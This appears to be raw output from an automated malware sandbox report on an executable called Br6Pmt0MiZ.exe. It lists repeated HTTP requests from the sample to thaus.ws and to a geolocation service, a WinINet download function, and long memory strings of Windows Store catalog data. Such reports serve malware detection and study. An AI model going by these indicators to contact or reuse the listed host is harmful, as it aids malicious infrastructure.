Source: global traffic	HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Host: thaus.ws
Source: global traffic	HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Host: thaus.ws
Source: global traffic	HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Host: thaus.ws
Source: global traffic	HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Host: thaus.ws
Source: global traffic	HTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Host: thaus.ws
Source: global traffic	HTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Host: thaus.ws
Source: global traffic	HTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Host: thaus.ws
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Host: thaus.ws
Source: global traffic	HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Host: thaus.ws
Source: global traffic	HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Host: thaus.ws
Source: global traffic	HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Host: thaus.ws
Source: global traffic	HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Host: thaus.ws
Source: global traffic	HTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Host: thaus.ws

Source: C:\Users\user\Desktop\Br6Pmt0MiZ.exe

Code function: 0_2_008B2930 memset,InternetOpenA,InternetOpenUrlA,InternetReadFile,strcmp,InternetCloseHandle,InternetCloseHandle,

0_2_008B2930

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Host: api.wipmania.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Host: api.wipmania.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Host: api.wipmania.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Host: api.wipmania.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Host: api.wipmania.com
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Host: thaus.ws
Source: global traffic	HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Host: thaus.ws
Source: global traffic	HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Host: thaus.ws
Source: global traffic	HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Host: thaus.ws
Source: global traffic	HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Host: thaus.ws
Source: global traffic	HTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Host: thaus.ws
Source: global traffic	HTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Host: thaus.ws
Source: global traffic	HTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Host: thaus.ws
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Host: thaus.ws
Source: global traffic	HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Host: thaus.ws
Source: global traffic	HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Host: thaus.ws
Source: global traffic	HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Host: thaus.ws
Source: global traffic	HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Host: thaus.ws
Source: global traffic	HTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Host: thaus.ws

Source: svchost.exe, 00000021.00000002.585835351.00000229F1D19000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.facebook.com (Facebook)
Source: svchost.exe, 00000021.00000002.585835351.00000229F1D19000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.twitter.com (Twitter)
Source: svchost.exe, 00000021.00000003.571266589.00000229F1D78000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2020-12-11T09:28:26.4450286Z\|\|.\|\|d07b02be-579d-431a-bb15-54f3b39debf4\|\|1152921505692660060\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 00000021.00000003.571266589.00000229F1D78000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2020-12-11T09:28:26.4450286Z\|\|.\|\|d07b02be-579d-431a-bb15-54f3b39debf4\|\|1152921505692660060\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 00000021.00000002.585835351.00000229F1D19000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI", equals www.facebook.com (Facebook)
Source: svchost.exe, 00000021.00000002.585835351.00000229F1D19000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI", equals www.twitter.com (Twitter)
Source: svchost.exe, 00000021.00000003.563266655.00000229F1D5F000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplementa equals www.facebook.com (Facebook)
Source: svchost.exe, 00000021.00000003.563266655.00000229F1D5F000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplementa equals www.twitter.com (Twitter)
Source: svchost.exe, 00000021.00000003.563266655.00000229F1D5F000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplementa equals www.youtube.com (Youtube)
Source: svchost.exe, 00000021.00000003.563266655.00000229F1D5F000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplementa8- equals www.facebook.com (Facebook)
Source: svchost.exe, 00000021.00000003.563266655.00000229F1D5F000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplementa8- equals www.twitter.com (Twitter)
Source: svchost.exe, 00000021.00000003.563266655.00000229F1D5F000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplementa8- equals www.youtube.com (Youtube)
Source: svchost.exe, 00000021.00000003.562826880.00000229F1D5B000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
Source: svchost.exe, 00000021.00000003.562826880.00000229F1D5B000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"M